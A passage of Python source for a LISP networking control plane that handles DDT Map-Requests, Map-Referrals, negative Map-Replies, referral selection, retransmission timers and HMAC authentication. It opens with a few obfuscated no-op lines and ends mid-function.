lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
map_request . target_eid , oo00 . rloc , to_etr = True )
if 51 - 51: OOooOOo + o0oOOo0O0Ooo . OOooOOo
return ( [ oOOOO0ooo . eid , oOOOO0ooo . group , LISP_DDT_ACTION_MS_ACK ] )
if 23 - 23: iIii1I11I1II1 + OoO0O00 / I1IiiI
if 48 - 48: OoOoOO00 + I11i + oO0o . I1IiiI
if 7 - 7: iII111i * i1IIi % OoOoOO00 % Ii1I . I1IiiI
if 53 - 53: OOooOOo / I11i + OOooOOo / I1IiiI / OoO0O00
if 12 - 12: i11iIiiIii % ooOoO0o / iII111i . IiII
if 68 - 68: OOooOOo / iIii1I11I1II1 + I1IiiI . ooOoO0o * IiII
if 72 - 72: I1Ii111
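#
# lisp_ddt_process_map_request
#
# Process a Map-Request received by a DDT-node, or by a Map-Server asked
# over the DDT. Find a delegation for the requested EID and answer with a
# Map-Referral: the delegation itself, a computed delegation-hole prefix,
# or a not-authoritative indication.
#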
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):

    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    nonce = map_request.nonce
    action = LISP_DDT_ACTION_NULL

    #
    # As a Map-Server, answer authoritatively from the site cache;
    # otherwise consult the DDT cache for a delegation.
    #
    ddt_entry = None
    if (lisp_i_am_ms):
        site_eid = lisp_site_eid_lookup(eid, group, False)
        if (site_eid == None): return

        if (site_eid.registered):
            action = LISP_DDT_ACTION_MS_ACK
            ttl = 1440
        else:
            eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
            action = LISP_DDT_ACTION_MS_NOT_REG
            ttl = 1
    else:
        ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
        if (ddt_entry == None):
            action = LISP_DDT_ACTION_NOT_AUTH
            ttl = 0
            lprint("DDT delegation entry not found for EID {}".format(green(eid_str, False)))
        elif (ddt_entry.is_auth_prefix()):

            #
            # An authoritative prefix covers the EID but no delegation
            # exists below it; compute the least-specific hole prefix.
            #
            action = LISP_DDT_ACTION_DELEGATION_HOLE
            ttl = 15
            auth_prefix_str = ddt_entry.print_eid_tuple()
            lprint(("DDT delegation entry not found but auth-prefix {} " + \
                "found for EID {}").format(auth_prefix_str,
                green(eid_str, False)))

            if (group.is_null()):
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    lisp_ddt_cache)
            else:
                group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
                    lisp_ddt_cache)
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    ddt_entry.source_cache)
            ddt_entry = None
        else:
            prefix_str = ddt_entry.print_eid_tuple()
            lprint("DDT delegation entry {} found for EID {}".format(prefix_str, green(eid_str, False)))
            ttl = 1440

    #
    # Build and send the Map-Referral. Requests with a zero nonce, or
    # with 0xdfdf0e1d in the upper nonce half, keep the requester's port;
    # everything else is answered on the LISP control port.
    #
    packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
    nonce = map_request.nonce >> 32
    if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return

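#
# lisp_find_negative_mask_len
#
# Widen neg_prefix.mask_len to the length of the longest common prefix
# between 'eid' and 'entry_prefix', so the negative prefix stops short of
# covering that entry.
#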
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
    diff = eid.hash_address(entry_prefix)
    address_size = eid.addr_length() * 8
    mask_len = 0

    #
    # Scan from the high-order end for the first bit where the EID and
    # this prefix differ; that index is the common prefix length.
    #
    for mask_len in range(address_size):
        bit = 1 << (address_size - mask_len - 1)
        if (diff & bit): break

    if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
    return

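#
# A sketch of the computation above, assuming hash_address() XORs the two
# addresses (consistent with its use here as a bit-difference metric).
# Values are illustrative only:
#
#   eid          = 10.1.1.1  (0x0A010101)
#   entry_prefix = 10.2.0.0  (0x0A020000)
#   xor          = 0x00030101, first set bit is 14 bits from the top,
#
# so the two addresses share a 14-bit prefix and neg_prefix.mask_len is
# raised to at least 14.
#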
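#
# lisp_neg_prefix_walk
#
# Callback passed to walk_cache() while computing a negative prefix.
# Skips entries that cannot cover the EID and otherwise widens the
# negative prefix, returning [True, parms] to keep the walk going.
#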
def lisp_neg_prefix_walk(entry, parms):
    eid, auth_prefix, neg_prefix = parms

    #
    # Skip entries that cannot cover the EID: wrong instance-ID or AFI
    # when no auth-prefix is supplied, or not more-specific than the
    # auth-prefix when one is.
    #
    if (auth_prefix == None):
        if (entry.eid.instance_id != eid.instance_id):
            return([True, parms])
        if (entry.eid.afi != eid.afi): return([True, parms])
    else:
        if (entry.eid.is_more_specific(auth_prefix) == False):
            return([True, parms])

    #
    # Grow the negative prefix's mask-length so it excludes this entry.
    #
    lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
    return([True, parms])

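#
# lisp_ddt_compute_neg_prefix
#
# Compute the negative prefix to return in a delegation-hole Map-Referral:
# the least-specific prefix that covers the EID without covering any
# delegation in the supplied cache.
#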
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):

    #
    # Only binary addresses can have a covering prefix computed; return
    # other EID types (distinguished-names, for example) as-is.
    #
    if (eid.is_binary() == False): return(eid)

    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0

    auth_prefix_str = ddt_entry.print_eid_tuple()
    auth_prefix = ddt_entry.eid

    #
    # Walk the cache, widening the mask-length just enough to avoid
    # covering any delegation below the auth-prefix.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))

    #
    # Zero out the host bits of the computed prefix.
    #
    neg_prefix.mask_address(neg_prefix.mask_len)

    lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
        "using auth-prefix {} is {}").format(green(eid.print_address(), False),
        auth_prefix_str, neg_prefix.print_prefix()))
    return(neg_prefix)

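#
# lisp_ms_compute_neg_prefix
#
# Map-Server variant: compute negative EID (and group) prefixes from the
# DDT cache and the site cache, returning [neg-prefix, group-neg-prefix,
# action] where the action distinguishes a delegation hole from a
# not-authoritative answer.
#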
def lisp_ms_compute_neg_prefix(eid, group):
    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0
    gneg_prefix = lisp_address(group.afi, "", 0, 0)
    gneg_prefix.copy_address(group)
    gneg_prefix.mask_len = 0
    auth_prefix = None

    #
    # For unicast EIDs, search the DDT cache by EID; for multicast,
    # search by group first and then by source-EID within the group
    # entry. A miss means we are not authoritative, so return host-mask
    # prefixes.
    #
    if (group.is_null()):
        ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            gneg_prefix.mask_len = gneg_prefix.host_mask_len()
            return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])

        cache = lisp_sites_by_eid
        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
    else:
        ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            gneg_prefix.mask_len = gneg_prefix.host_mask_len()
            return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])

        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group

        group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache(lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))

        gneg_prefix.mask_address(gneg_prefix.mask_len)

        lprint(("Least specific prefix computed from site-cache for " + \
            "group EID {} using auth-prefix {} is {}").format(group.print_address(), auth_prefix.print_prefix() if (auth_prefix != None) else "'not found'",
            gneg_prefix.print_prefix()))

        cache = ddt_entry.source_cache

    #
    # Return the delegation-hole action only when an auth-prefix covers
    # the EID; otherwise we are not authoritative for it.
    #
    action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else LISP_DDT_ACTION_NOT_AUTH

    #
    # Walk the selected cache to compute the EID negative prefix, then
    # zero out the host bits.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))

    neg_prefix.mask_address(neg_prefix.mask_len)

    lprint(("Least specific prefix computed from site-cache for EID {} " + \
        "using auth-prefix {} is {}").format(green(eid.print_address(), False),
        auth_prefix.print_prefix() if (auth_prefix != None) else "'not found'", neg_prefix.print_prefix()))

    return([neg_prefix, gneg_prefix, action])

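#
# lisp_ms_send_map_referral
#
# Build and send a Map-Referral from a Map-Server in response to a DDT
# Map-Request, encoding one EID-record plus one RLOC-record per delegate.
#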
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
    action, eid_prefix, group_prefix):

    eid = map_request.target_eid
    group = map_request.target_group
    nonce = map_request.nonce

    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440

    #
    # Build the Map-Referral header.
    #
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    incomplete = False

    #
    # When no site was found, compute the negative prefix and action to
    # return, then pick the record TTL appropriate for each action.
    #
    if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
        eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
            group)
        ttl = 15
    if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
    if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
    if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0

    is_ms_peer = False
    ref_count = 0
    ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
    if (ddt_entry != None):
        ref_count = len(ddt_entry.delegation_set)
        is_ms_peer = ddt_entry.is_ms_peer_entry()
        ddt_entry.map_referrals_sent += 1

    #
    # The incomplete bit is set when we are not authoritative, or when
    # the referral-set does not come from a Map-Server peer.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (is_ms_peer == False)

    #
    # Encode the single EID-record.
    #
    eid_record = lisp_eid_record()
    eid_record.rloc_count = ref_count
    eid_record.authoritative = True
    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.eid = eid_prefix
    eid_record.group = group_prefix
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record(" ", True)

    #
    # Encode one RLOC-record per delegate in the delegation set.
    #
    if (ref_count != 0):
        for ddt_node in ddt_entry.delegation_set:
            rloc_record = lisp_rloc_record()
            rloc_record.rloc = ddt_node.delegate_address
            rloc_record.priority = ddt_node.priority
            rloc_record.weight = ddt_node.weight
            rloc_record.mpriority = 255
            rloc_record.mweight = 0
            rloc_record.reach_bit = True
            packet += rloc_record.encode()
            rloc_record.print_record(" ")

    #
    # Requests with a non-zero nonce are answered on the control port.
    #
    if (map_request.nonce != 0): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return

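#
# lisp_send_negative_map_reply
#
# Send a Map-Reply with an empty RLOC-set for an EID we cannot resolve,
# either directly or through the pubsub machinery when requested.
#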
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
    xtr_id, pubsub):

    lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}".format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
        red(dest.print_address(), False)))

    action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else LISP_DROP_ACTION

    #
    # When the EID carries an EID hash (crypto-EID), return a
    # send-map-request action so the ITR retries once it registers.
    #
    if (lisp_get_eid_hash(eid) != None):
        action = LISP_SEND_MAP_REQUEST_ACTION

    packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
        None, False, False)

    #
    # A pubsub request gets subscribed rather than just answered.
    #
    if (pubsub):
        lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
            xtr_id)
    else:
        lisp_send_map_reply(sockets, packet, dest, port)
    return

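#
# lisp_retransmit_ddt_map_request
#
# Timer handler: retransmit an outstanding DDT Map-Request, counting
# non-responses against the referral-node last tried, until the retry
# limit is reached.
#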
def lisp_retransmit_ddt_map_request(mr):
    source_str = mr.mr_source.print_address()
    eid_str = mr.print_eid_tuple()
    nonce = mr.nonce

    #
    # Count a non-response against the referral-node the last request
    # was sent to.
    #
    if (mr.last_request_sent_to):
        addr_str = mr.last_request_sent_to.print_address()
        ref_entry = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1], True)
        if (ref_entry and ref_entry.referral_set.has_key(addr_str)):
            ref_entry.referral_set[addr_str].no_responses += 1

    #
    # Give up after the retry limit (note: reuses the Map-Notify limit)
    # and remove the queued request.
    #
    if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}".format(green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    mr.retry_count += 1

    src_str = green(source_str, False)
    dst_str = green(eid_str, False)
    lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}".format(bold("Map-Request", False), "P" if mr.from_pitr else "",
        red(mr.itr.print_address(), False), src_str, dst_str,
        lisp_hex_string(nonce)))

    lisp_send_ddt_map_request(mr, False)

    #
    # Rearm the retransmission timer.
    #
    mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
        lisp_retransmit_ddt_map_request, [mr])
    mr.retransmit_timer.start()
    return

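#
# lisp_get_referral_node
#
# Select a referral-node from a referral-set: keep the up nodes with the
# best (lowest) priority and load-split among them by EID hash.
#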
def lisp_get_referral_node(referral, source_eid, dest_eid):

    #
    # Collect the up referral-nodes that share the lowest priority.
    #
    best_nodes = []
    for ref_node in referral.referral_set.values():
        if (ref_node.updown == False): continue
        if (len(best_nodes) == 0 or best_nodes[0].priority == ref_node.priority):
            best_nodes.append(ref_node)
        elif (best_nodes[0].priority > ref_node.priority):
            best_nodes = []
            best_nodes.append(ref_node)

    count = len(best_nodes)
    if (count == 0): return(None)

    #
    # Hash source and destination EIDs to spread requests across the set.
    #
    hashval = dest_eid.hash_address(source_eid)
    hashval = hashval % count
    return(best_nodes[hashval])

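#
# lisp_send_ddt_map_request
#
# Send (or re-send) a queued Map-Request down the DDT hierarchy, either
# from the best cached referral or, when send_to_root is set, starting
# over at the DDT root.
#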
def lisp_send_ddt_map_request(mr, send_to_root):
    lisp_sockets = mr.lisp_sockets
    nonce = mr.nonce
    itr = mr.itr
    mr_source = mr.mr_source
    eid_str = mr.print_eid_tuple()

    #
    # Give up after too many total transmissions for this queue entry.
    #
    if (mr.send_count == 8):
        lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format(green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    #
    # When jumping to the root, look up the coarsest (null) prefix so a
    # root referral is used instead of the target EID's entry.
    #
    if (send_to_root):
        lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        mr.tried_root = True
        lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
    else:
        lookup_eid = mr.eid
        lookup_group = mr.group

    #
    # No referral at all means we cannot make progress; answer the ITR
    # negatively.
    #
    referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
    if (referral == None):
        lprint("No referral cache entry found")
        lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
            nonce, itr, mr.sport, 15, None, False)
        return

    referral_str = referral.print_eid_tuple()
    lprint("Found referral cache entry {}, referral-type: {}".format(referral_str,
        referral.print_referral_type()))

    ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
    if (ref_node == None):
        lprint("No reachable referral-nodes found")
        mr.dequeue_map_request()
        lisp_send_negative_map_reply(lisp_sockets, referral.eid,
            referral.group, nonce, itr, mr.sport, 1, None, False)
        return

    lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}".format(ref_node.referral_address.print_address(),
        referral.print_referral_type(), green(eid_str, False),
        lisp_hex_string(nonce)))

    #
    # Encapsulate the Map-Request towards the referral node, flagging it
    # as going to a Map-Server when the referral says so.
    #
    to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
        referral.referral_type == LISP_DDT_ACTION_MS_ACK)
    lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
        ref_node.referral_address, to_ms=to_ms, ddt=True)

    #
    # Bookkeeping for retransmission accounting.
    #
    mr.last_request_sent_to = ref_node.referral_address
    mr.last_sent = lisp_get_timestamp()
    mr.send_count += 1
    ref_node.map_requests_sent += 1
    return

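#
# lisp_mr_process_map_request
#
# Map-Resolver entry point for an ITR's Map-Request: queue the request
# and begin walking the DDT hierarchy for the target EID.
#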
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
    sport, mr_source):

    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = map_request.print_eid_tuple()
    source_str = mr_source.print_address()
    nonce = map_request.nonce

    src_str = green(source_str, False)
    dst_str = green(eid_str, False)
    lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}".format("P" if map_request.pitr_bit else "",
        red(ecm_source.print_address(), False), src_str, dst_str,
        lisp_hex_string(nonce)))

    #
    # Queue the request and start the DDT lookup for the EID.
    #
    mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
    mr.packet = packet
    mr.itr = ecm_source
    mr.mr_source = mr_source
    mr.sport = sport
    mr.from_pitr = map_request.pitr_bit
    mr.queue_map_request()

    lisp_send_ddt_map_request(mr, False)
    return

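#
# lisp_process_map_request
#
# Demultiplex a received Map-Request to whichever roles this process is
# running: RLOC-probe and SMR handling, ETR, Map-Server, Map-Resolver,
# or DDT-node.
#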
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
    mr_source, mr_port, ddt_request, ttl, timestamp):

    orig_packet = packet
    map_request = lisp_map_request()
    packet = map_request.decode(packet, mr_source, mr_port)
    if (packet == None):
        lprint("Could not decode Map-Request packet")
        return

    map_request.print_map_request()

    #
    # RLOC-probes are handled on their own path.
    #
    if (map_request.rloc_probe):
        lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
            mr_port, ttl, timestamp)
        return

    #
    # Handle Solicit-Map-Request and SMR-invoked requests.
    #
    if (map_request.smr_bit):
        lisp_process_smr(map_request)

    if (map_request.smr_invoked_bit):
        lisp_process_smr_invoked_request(map_request)

    #
    # An ETR answers Map-Requests for its own EIDs.
    #
    if (lisp_i_am_etr):
        lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
            mr_port, ttl, timestamp)

    #
    # A Map-Server answers (or forwards) for registered sites, and adds
    # a Map-Referral when the request arrived over the DDT.
    #
    if (lisp_i_am_ms):
        packet = orig_packet
        eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
            orig_packet, map_request, mr_source, mr_port, ecm_source)
        if (ddt_request):
            lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
                ecm_port, ddt_action, eid, group)
        return

    #
    # A Map-Resolver walks the DDT on behalf of the ITR.
    #
    if (lisp_i_am_mr and not ddt_request):
        lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
            ecm_source, mr_port, mr_source)

    #
    # A DDT-node (or any node receiving a DDT request) returns a
    # Map-Referral.
    #
    if (lisp_i_am_ddt or ddt_request):
        packet = orig_packet
        lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
            ecm_port)
    return

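#
# lisp_store_mr_stats
#
# Record negative Map-Reply statistics, and round-trip time when the
# nonce matches, for the Map-Resolver that answered us.
#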
def lisp_store_mr_stats(source, nonce):
    mr = lisp_get_map_resolver(source, None)
    if (mr == None): return

    #
    # Count negative Map-Replies from this Map-Resolver and timestamp it.
    #
    mr.neg_map_replies_received += 1
    mr.last_reply = lisp_get_timestamp()

    #
    # Reset the accumulated RTT every 100 replies.
    #
    if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0

    #
    # When the reply matches the outstanding nonce, fold its RTT in.
    #
    if (mr.last_nonce == nonce):
        mr.total_rtt += (time.time() - mr.last_used)
        mr.last_nonce = 0
    if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
    return

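#
# lisp_process_map_reply
#
# Process a received Map-Reply: walk its EID-records and RLOC-records,
# add or refresh map-cache entries, and handle RLOC-probe replies,
# NAT-traversal RLOC selection, and data-plane key changes along the way.
#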
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
    global lisp_map_cache

    map_reply = lisp_map_reply()
    packet = map_reply.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Reply packet")
        return

    map_reply.print_map_reply()

    #
    # Process each EID-record in the Map-Reply.
    #
    rloc_key_change = None
    for i in range(map_reply.record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Reply packet")
            return
        eid_record.print_record(" ", False)

        #
        # A negative reply (no RLOCs) updates Map-Resolver statistics.
        #
        if (eid_record.rloc_count == 0):
            lisp_store_mr_stats(source, map_reply.nonce)

        multicast = (eid_record.group.is_null() == False)

        #
        # In LISP-Decent push mode, ignore drop-action (S,G) records for
        # locally sourced groups.
        #
        if (lisp_decent_push_configured):
            action = eid_record.action
            if (multicast and action == LISP_DROP_ACTION):
                if (eid_record.eid.is_local()): continue

        if (multicast == False and eid_record.eid.is_null()): continue

        #
        # Look up an existing map-cache entry, unicast or (S,G).
        #
        if (multicast):
            mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        else:
            mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
        new_mc = (mc == None)

        #
        # Gleaned entries are owned by the gleaning logic; do not
        # overwrite them with Map-Reply state.
        #
        if (mc == None):
            glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
                None)
            if (glean): continue
        else:
            if (mc.gleaned): continue

        #
        # Process each RLOC-record for this EID-record.
        #
        rloc_set = []
        mcast_rloc = None
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            rloc_record.keys = map_reply.keys
            packet = rloc_record.decode(packet, map_reply.nonce)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Reply packet")
                return
            rloc_record.print_record(" ")

            old_rloc = None
            if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
            if (old_rloc):
                rloc = old_rloc
            else:
                rloc = lisp_rloc()

            #
            # Store state from the RLOC-record, including any keys, and
            # set up echo-noncing when the RLOC supports it.
            #
            port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
                source)
            rloc.echo_nonce_capable = map_reply.echo_nonce_capable

            if (rloc.echo_nonce_capable):
                addr_str = rloc.rloc.print_address_no_iid()
                if (lisp_get_echo_nonce(None, addr_str) == None):
                    lisp_echo_nonce(addr_str)

            #
            # Pass the ITR input timestamp through telemetry JSON when
            # present.
            #
            if (rloc.json):
                if (lisp_is_json_telemetry(rloc.json.json_string)):
                    json_str = rloc.json.json_string
                    json_str = lisp_encode_telemetry(json_str, ii=itr_in_ts)
                    rloc.json.json_string = json_str

            #
            # An RLOC-probe reply updates RLOC state; remember a
            # multicast RLOC for the probe logic.
            #
            if (map_reply.rloc_probe and rloc_record.probe_bit):
                if (rloc.rloc.afi == source.afi):
                    lisp_process_rloc_probe_reply(rloc, source, port,
                        map_reply, ttl, mcast_rloc)
                if (rloc.rloc.is_multicast_address()): mcast_rloc = rloc

            rloc_set.append(rloc)

            #
            # Remember an RLOC that recently rekeyed so its keys can be
            # pushed to the data-plane below.
            #
            if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
                rloc_key_change = rloc

        #
        # With NAT-traversal, an ITR keeps private RLOCs and RTR RLOCs
        # (priority 254); an RTR keeps everything else.
        #
        if (map_reply.rloc_probe == False and lisp_nat_traversal):
            new_set = []
            addr_list = []
            for rloc in rloc_set:

                #
                # Private RLOCs are reachable in the same address realm;
                # prefer them but mark unreachable until probed.
                #
                if (rloc.rloc.is_private_address()):
                    rloc.priority = 1
                    rloc.state = LISP_RLOC_UNREACH_STATE
                    new_set.append(rloc)
                    addr_list.append(rloc.rloc.print_address_no_iid())
                    continue

                if (rloc.priority == 254 and lisp_i_am_rtr == False):
                    new_set.append(rloc)
                    addr_list.append(rloc.rloc.print_address_no_iid())
                if (rloc.priority != 254 and lisp_i_am_rtr):
                    new_set.append(rloc)
                    addr_list.append(rloc.rloc.print_address_no_iid())

            if (addr_list != []):
                rloc_set = new_set
                lprint("NAT-traversal optimized RLOC-set: {}".format(addr_list))

        #
        # Prune RLOC-records that carry no address (JSON-only records).
        #
        new_set = []
        for rloc in rloc_set:
            if (rloc.json != None): continue
            new_set.append(rloc)

        if (new_set != []):
            count = len(rloc_set) - len(new_set)
            lprint("Pruning {} no-address RLOC-records for map-cache".format(count))
            rloc_set = new_set

        #
        # For an RLOC-probe reply, keep the existing cached RLOC-set.
        #
        if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set

        #
        # If the RLOC-set changed, the RLOC-probe list must be rebuilt.
        #
        rloc_change = new_mc
        if (mc and rloc_set != mc.rloc_set):
            mc.delete_rlocs_from_rloc_probe_list()
            rloc_change = True

        #
        # Add a new map-cache entry or refresh the existing one. An RTR
        # keeps (S,G) state longer than the record TTL.
        #
        uptime = mc.uptime if (mc) else None
        if (mc == None):
            mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
            mc.mapping_source = source

            if (lisp_i_am_rtr and eid_record.group.is_null() == False):
                mc.map_cache_ttl = LISP_MCAST_TTL
            else:
                mc.map_cache_ttl = eid_record.store_ttl()
            mc.action = eid_record.action
            mc.add_cache(rloc_change)

        add_or_replace = "Add"
        if (uptime):
            mc.uptime = uptime
            mc.refresh_time = lisp_get_timestamp()
            add_or_replace = "Replace"

        lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
            green(mc.print_eid_tuple(), False), len(rloc_set)))

        #
        # Push rekeyed RLOC keys to an external data-plane.
        #
        if (lisp_ipc_dp_socket and rloc_key_change != None):
            lisp_write_ipc_keys(rloc_key_change)

        #
        # A brand new entry triggers RLOC-probes to its best RLOCs.
        #
        if (new_mc):
            probe_str = bold("RLOC-probe", False)
            for rloc in mc.best_rloc_set:
                addr_str = red(rloc.rloc.print_address_no_iid(), False)
                lprint("Trigger {} to {}".format(probe_str, addr_str))
                lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
    return

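#
# lisp_compute_auth
#
# Compute and store the authentication data for a Map-Register: hash the
# packet with a zeroed auth field, then write the result back in.
#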
def lisp_compute_auth(packet, map_register, password):
    if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)

    packet = map_register.zero_auth(packet)
    hashval = lisp_hash_me(packet, map_register.alg_id, password, False)

    map_register.auth_data = hashval
    packet = map_register.encode_auth(packet)
    return(packet)

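#
# lisp_hash_me
#
# Return the HMAC of 'packet' keyed with 'password'. The hash algorithm
# is selected by alg_id (SHA-1 or SHA-256); do_hex selects a hex digest
# versus raw bytes.
#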
def lisp_hash_me(packet, alg_id, password, do_hex):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        hash_function = hashlib.sha1
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        hash_function = hashlib.sha256

    if (do_hex):
        hashval = hmac.new(password, packet, hash_function).hexdigest()
    else:
        hashval = hmac.new(password, packet, hash_function).digest()
    return(hashval)

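#
# For reference, the computation above is plain RFC 2104 HMAC. A sketch
# of checking a SHA-256 authenticated packet offline (illustrative names,
# and 'packet' must already have its auth field zeroed):
#
#   import hmac, hashlib
#   digest = hmac.new("map-server-password", packet,
#       hashlib.sha256).hexdigest()
#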
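#
# lisp_verify_auth
#
# Verify the authentication data of a received packet against the shared
# password, logging a mismatch.
#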
def lisp_verify_auth(packet, alg_id, auth_data, password):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    hashval = lisp_hash_me(packet, alg_id, password, True)
    match = (hashval == auth_data)

    if (match == False):
        lprint("Hashed value: {} does not match packet value: {}".format(hashval, auth_data))
    return(match)

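#
# lisp_retransmit_map_notify
#
# Timer handler: retransmit a Map-Notify to an ETR, dequeuing it once the
# retry limit is reached.
#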
def lisp_retransmit_map_notify(map_notify):
    etr = map_notify.etr
    port = map_notify.etr_port

    #
    # After the retry limit, cancel the timer and dequeue the Map-Notify.
    #
    if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}".format(map_notify.nonce_key, red(etr.print_address(), False)))

        key = map_notify.nonce_key
        if (lisp_map_notify_queue.has_key(key)):
            map_notify.retransmit_timer.cancel()
            lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(key))
            try:
                lisp_map_notify_queue.pop(key)
            except:
                lprint("Key not found in Map-Notify queue")
        return

    lisp_sockets = map_notify.lisp_sockets
    map_notify.retry_count += 1

    lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format(bold("Map-Notify", False), map_notify.nonce_key,
        red(etr.print_address(), False), map_notify.retry_count))

    lisp_send_map_notify(lisp_sockets, map_notify.packet, etr, port)
    if (map_notify.site): map_notify.site.map_notifies_sent += 1

    #
    # Rearm the retransmission timer.
    #
